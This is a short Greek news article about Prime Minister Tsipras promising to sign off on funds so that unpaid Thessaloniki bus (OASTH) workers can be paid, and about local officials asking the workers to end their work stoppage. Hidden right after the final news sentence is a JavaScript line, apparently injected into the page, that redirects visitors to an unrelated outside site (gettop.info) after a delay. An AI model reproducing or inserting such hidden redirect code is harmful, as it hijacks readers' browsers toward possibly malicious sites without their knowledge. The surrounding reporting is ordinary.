Δέσμευση Τσίπρα για τον ΟΑΣΘ – Τη Δευτέρα οι υπογραφές

0
5

 

Να μην φύγει από τη Θεσσαλονίκη αν δεν υπάρξει λύση στο θέμα του ΟΑΣΘ ζήτησε ο περιφερειάρχης Κεντρικής Μακεδονίας, Απόστολος Τζιτζικώστας από τον πρωθυπουργό.

Εκείνος κατά την επίσκεψή του στη Θεσσαλονίκη είχε σύσκεψη με τους εκπροσώπους των φορέων της πόλης και δεσμεύθηκε ρητά ότι θα δώσει εντολή και τη Δευτέρα θα μπουν οι απαιτούμενες υπογραφές, ώστε να ξεπεραστούν τα οποία προβλήματα υπάρχουν και να εκταμιευθεί το ποσό για να πληρωθούν οι εργαζόμενοι.

Όλοι οι εκπρόσωποι φορέων που συμμετείχαν στη σύσκεψη τόνισαν την ανάγκη να υπάρξει αναστολή της επίσχεσης εργασίας, ενώ και ο κ Τζιτζικώστας απηύθυνε έκκληση στους εργαζομένους του ΟΑΣΘ να αναστείλουν την επίσχεση εργασίας.

Την αναστολή της επίσχεσης ζήτησε με δηλώσεις του και ο πρόεδρος του Δημοτικού Συμβουλίου του δήμου Θεσσαλονίκης Παναγιώτης Αβραμόπουλος, εκπροσωπώντας τον δήμαρχο Γιάννη Μπουτάρη στη σύσκεψη υπό τον πρωθυπουργό.

Το σωματείο των εργαζομένων στον ΟΑΣΘ δεν έχει τοποθετηθεί ακόμη επί του ζητήματος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here